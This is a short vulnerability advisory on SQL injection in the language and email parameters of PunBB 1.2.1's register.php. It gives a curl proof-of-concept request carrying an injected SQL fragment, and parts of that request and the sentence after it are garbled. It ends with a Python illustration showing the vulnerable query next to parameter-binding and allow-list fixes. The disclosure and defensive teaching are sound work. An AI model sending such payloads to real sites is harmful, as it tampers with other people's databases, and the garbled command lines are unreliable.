=================================================
SQL Injections in punbb-1.2.1 register.php
=================================================

Description
-----------

A remote attacker can cause register.php to execute arbitrary SQL statements by supplying malicious values to the language or email parameter. The email parameter is guarded by the function is_valid_email, but this function doesn't do any real filtering and will pass any SQL statement that is formatted so as to look like a valid address. This also affects systems using the magic_quotes_gpc option in php.ini.

Proof of concept
----------------

This example only demonstrates the vulnerability in the language parameter.

curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 'Oxygen', 0, '', 0) -- " http://target/register.php?action=registerer

Will create a user with the language English, style Oxygen and ip
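The following is an added illustration, not code from the advisory or from PunBB: it models the registration INSERT against a constructed SQLite table (the column order and the installed-language list are assumptions chosen so the advisory's language value lines up) and shows why interpolating the value breaks the statement, while binding it as a parameter and checking it against the installed languages does not.

```python
import sqlite3

# Constructed stand-in for the forum's users table. The column order is an
# assumption chosen so the advisory's payload lines up; it is not PunBB's schema.
SCHEMA = """CREATE TABLE users (
    username TEXT, email TEXT, language TEXT, style TEXT,
    num_posts INTEGER, registration_ip TEXT, registered INTEGER)"""

INSTALLED_LANGUAGES = {"English", "German"}   # constructed allow-list (lang/ directory)
PAYLOAD = "English', 'Oxygen', 0, '', 0) -- "  # the language value from the advisory
COLS = "(username, email, language, style, num_posts, registration_ip, registered)"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def row_for(conn, username):
    return conn.execute(
        "SELECT language, style, registration_ip, registered FROM users WHERE username = ?",
        (username,)).fetchone()


def register_vulnerable(conn, username, email, language, ip, now):
    """Interpolates request values into the INSERT, the pattern the advisory describes."""
    sql = (f"INSERT INTO users {COLS} VALUES ('{username}', '{email}', '{language}', "
           f"'Oxygen', 0, '{ip}', {now})")
    conn.execute(sql)  # with PAYLOAD the ')' closes VALUES and '--' discards ip and time
    return row_for(conn, username)


def register_bound(conn, username, email, language, ip, now):
    """Same INSERT with bound parameters: the value is stored as data, never parsed as SQL."""
    conn.execute(f"INSERT INTO users {COLS} VALUES (?, ?, ?, 'Oxygen', 0, ?, ?)",
                 (username, email, language, ip, now))
    return row_for(conn, username)


def register_hardened(conn, username, email, language, ip, now):
    """Allow-list the language before it reaches the query, then bind as above."""
    if language not in INSTALLED_LANGUAGES:
        raise ValueError("unknown language")
    return register_bound(conn, username, email, language, ip, now)


if __name__ == "__main__":
    print(register_vulnerable(fresh_db(), "sha", "sha@example.com", PAYLOAD, "10.0.0.1", 1234))
    print(register_bound(fresh_db(), "sha", "sha@example.com", PAYLOAD, "10.0.0.1", 1234))
```

The vulnerable path stores an empty registration IP and a zero timestamp chosen by the request, whereas the bound path stores the whole string verbatim as the language and the hardened path rejects it outright.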